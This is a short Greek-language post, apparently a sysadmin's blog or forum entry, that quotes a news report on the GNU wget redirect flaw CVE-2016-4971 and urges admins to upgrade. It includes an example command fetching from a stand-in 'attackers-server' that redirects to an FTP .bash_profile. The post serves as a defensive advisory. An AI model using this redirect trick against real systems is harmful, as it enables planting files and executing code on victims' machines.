Πριν από λίγες μέρες βγήκε ένα vulnerability σχετικά με το wget και καλο θα ήταν όλοι οι admins να αναβαθμίσουν τα σύστημα τους:
"GNU wget flaw leads to RCE"
Golunski explains in an advisory that a malicious actor could trick a wget file download process into executing code on someone's Linux machine.
"The vulnerability could potentially [be] abused by attackers to upload arbitrary files and achieve code execution," Dawid Golunski told Softpedia in an email.
GNU wget, which is a Linux command-line utility for silently downloading content, has support for URL redirections, in case a link has changed across time.
"GNU wget doesn't rename files when redirected to FTP links"
Golunski discovered that wget doesn't properly handle file names when redirected from an initial HTTP URL to an FTP link.
For example, an attacker in control of a server from where files are regularly downloaded via wget can use 302 redirects on their files. A user running the "wget http://attackers-server/safe_file.txt" command would be redirected to download "ftp://attackers-server/.bash_profile" instead.
In normal HTTP to HTTP redirects, GNU wget will rename the second file with the name of the original file (.bash_profile to safe_file.txt) in order to prevent RCE (Remote Code Execution). For HTTP to FTP links, wget doesn't include this safety mechanism. This issue affects all GNU wget versions prior to the patched 1.18 version.
Since wget commands are used regularly in scripts that most of the time execute the downloaded file automatically, this opens the door for a new wave of possible attacks. Cronjobs where wget is the preferred method of downloading content should be reviewed by all sysadmins
wget vulnerability CVE-2016-4971:
https://cve.mitre.org/cgi-bin/cvename.c ... -2016-4971
Για οποιαδήποτε βοήθεια σχετικά με τον server σας επικοινωνήστε μαζί μου στο skype: jimspiti76
Server security optimizations
Database performance optimizations